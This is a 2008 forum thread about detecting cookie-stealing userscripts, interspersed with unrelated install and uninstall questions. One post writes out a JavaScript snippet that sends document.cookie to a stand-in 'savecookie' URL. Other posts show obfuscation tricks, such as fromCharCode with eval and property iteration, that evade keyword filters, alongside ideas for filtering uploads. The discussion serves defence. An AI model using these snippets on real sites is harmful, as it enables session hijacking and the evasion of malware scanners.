Posts that Deb Morrissey is monitoring

Subscribe to Posts that Deb Morrissey is monitoring 116 posts found

Aug 13, 2008
dkhal 1 post

Topic: Cookie Stealing Scripts

yes this is known as cookie poisoning i think i read about it in Wikipedia
all they do is insert a variable in the script like this
cookie=document.cookie;
and they call an Ajax request to store the cookie on a web of their own like this:
var xmlHttp
xmlHttp=GetXmlHttpObject();
var url="savecookie.asp or .php";
url=url+"?cookie="+cookie;
xmlHttp.open("GET",url,true);
xmlHttp.send(null);

if you see any of these lines in your scripts delete it immediately and report it
 
Aug 6, 2008
Jaff Andrew 1 post

Topic: Cookie Stealing Scripts

I know script is not very safe, so each time I insalll it I will check it carefully
 
Jul 5, 2008
armvdw 5 posts

Topic: Cookie Stealing Scripts

I think the best way to date is by implementing this on the userscript site :
http://userscripts.uservoice.com/pages/general/...
 
Jul 5, 2008
mellamokb 1 post

Topic: Cookie Stealing Scripts

How about a watch on the call to document.cookie to determine if cookie is being interacted with in any way shape or form? This would be vulnerable to a redefinition of the watch method.
 
May 13, 2008
Sammpo 2 posts

Topic: Cookie Stealing Scripts

Hi, i got some problem it says windows isnt determined and document isnt determined anyone can help me plz!!
 
May 6, 2008
DavidJCobb 2 posts

Topic: Cookie Stealing Scripts

If possible, the server can actually run a quick test of the code giving it random-ish values if it asks for DOM-related stuff, and if it gets a request for document.cookie, it flags the script as possible malware?

I have no idea how much (or little?) bandwidth or server processing power that suggestion would require to use, so it would probably be an implausible solution...
 
May 3, 2008
Sonnefes 1 post

Topic: Cookie Stealing Scripts

No OGame Tr Server Scripts..??
 
Apr 29, 2008
Aquilax 260 posts

Topic: Cookie Stealing Scripts

The fromCharCode is not the only way to build a string, I can do it with a simple strings concatenation "doc"+"ume"+"nt."+"coo"+"kie", or with an array ["doc","ume","nt.","coo","kie"].join("") and there are a lot of other ways much complicated and more obfuscated to create the string "document.cookie", but this is not the only way to access the cookies, look at the following code: for(var prop in document) if (prop.indexOf("coo")!=-1) { document[prop] }.
 
Apr 28, 2008
DavidJCobb 2 posts

Topic: Cookie Stealing Scripts

Perhaps the uploading process can scan for the aforementioned keywords to detect cookie stealing, while also searching for shorturls and tinyurls; if such URLs are found, a notice can be displayed alerting people that the userscript links to unknown URLs and may thus contain hazardous code; and if the cookie stealing stuff is displayed, the script can be immediately blocked.

As for stopping the charcode workaround, the userscript can search for charcode-related functions and scan them for the respective charcodes in addition to searching for the string "document.cookie"; it may also be necessary to search for any occurances of a coder storing a charcode function in a variable to avoid detection, e.x. (var avoidTheFilters = String.fromCharCode;). This, however, will fail to stop the following possible filter workaround:

varname.scrapText.value=eval(String.fromCharCode(100,111,99)+String.fromCharCode(117,109,101,110,116)+String.fromCharCode(46,99,111,111,107,105,101))

So the following upload filters could be enacted to prevent cookie exploits, charcode-related vulnerabilities, and potential problems with URL-shortening services:

  • Search for cookie-stealing keywords
    • Find all String.fromCharCode() statements and replace them with their results such that "String.fromCharCode(100,111,99)" becomes "doc"
  • Search for tinyurls, shorturls, etc., and display warning notices if any are found
 
Apr 22, 2008
antwanto 1 post

Topic: Cookie Stealing Scripts

aaaa
 
Mar 30, 2008
malious 3 posts

Topic: Cookie Stealing Scripts

Hii ur scripts doesn't work at all.Only it says "Unlocked by Sergio..." goddamn bullshit!!! Neither i know how to uninstall the scripts in my Firefox browser ??!!??

what are you talking about?
 
Mar 27, 2008
bonebreak 1 post

Topic: Cookie Stealing Scripts

o_O I don't understand, this script is safe right? I was going to try and get in contact with the maker or someone of code knowledge because it doesn't work for videos using "/ep_gr.swf?v=" I have to remove "/ep_gr.swf" was thinking script should be able to do that but no idea what so ever how to script it.
 
Mar 17, 2008
p kumar 2 posts

Topic: Cookie Stealing Scripts

Hii ur scripts doesn't work at all.Only it says "Unlocked by Sergio..." goddamn bullshit!!! Neither i know how to uninstall the scripts in my Firefox browser ??!!??
 
Mar 17, 2008
p kumar 2 posts

Topic: Cookie Stealing Scripts

Hii ur scripts doesn't work at all.Only it says "Unlocked by Sergip..." GodDamn bullshit!!! Neither i know how to uninstall the scripts in my Firefox browser ??!!??
 
Feb 23, 2008
Luckyless 1 post

Topic: Cookie Stealing Scripts

!
 
Feb 23, 2008
Descriptor 757 posts

Topic: Cookie Stealing Scripts

Wrong Topic
> http://www.greasespot.net/
 
Feb 22, 2008
maremp 1 post

Topic: Cookie Stealing Scripts

Can someone explain me how to install scripts? I was looking in that topic and try diffrent things but still can't install scripts. Please help me.
 
Jan 12, 2008
zapatista 1 post

Topic: Cookie Stealing Scripts

hi..
im not downloading scripts:(

i dont speak english (:
 
Jan 3, 2008
Joel H 347 posts

Topic: Cookie Stealing Scripts

Tools -> Add Ons, select Greasemonkey and hit 'Uninstall'. This is assuming that you want to get rid of Greasemonkey in its entirety, as opposed to deleting only one particular script.

-Joel
 
Jan 3, 2008
zzstar 2 posts

Topic: Cookie Stealing Scripts

How do you uninstall Greasemonkey?
 
Jan 2, 2008
Descriptor 757 posts

Topic: Cookie Stealing Scripts

@zzstar
That script looks harmless, but I can't guarantee anything. Because it uses innerHTML and writes very poor (invalid) code onto the page, the result it might have is unknown.
For scripts that use innerHTML you want to be careful and check any links (href) and images (src) that they start with a known domain, in this case myspace.com/ (and probably not "malicious-user.myspace.com/").
 
Jan 2, 2008
Jordon Kalilich 38 posts

Topic: Cookie Stealing Scripts

zzstar: The script seems okay. It just puts links to your profile, pictures, blog, videos, etc. on your home page.
 
Jan 2, 2008
zzstar 2 posts

Topic: Cookie Stealing Scripts

Can anyone guarantee that the script 'MyspaceHax' http://userscripts.org/scripts/show/3856 -- is safe to install?
 
Dec 28, 2007
LouCypher 207 posts

Topic: Cookie Stealing Scripts

I don't like the FBI. Please get rid of the FBI

Don't you love Mulder and Scully?
 
Dec 28, 2007
zzo38 10 posts

Topic: Cookie Stealing Scripts

I don't like the FBI. Please get rid of the FBI (however, I don't live in the United States anyways). I found one script that tells you it steals cookies that is the title of the script. Other ones that steal cookies you should instead just add a note to the description to make it clear what it is before people install it. Also if you want to check what it does, is always good idea to view source first before installing anything, because even if it isn't malicious, it might not be what you want anyways. You can also be free to modify a local copy of the script in case you want to modify it for not stealing cookies or to change any other functionality of the script.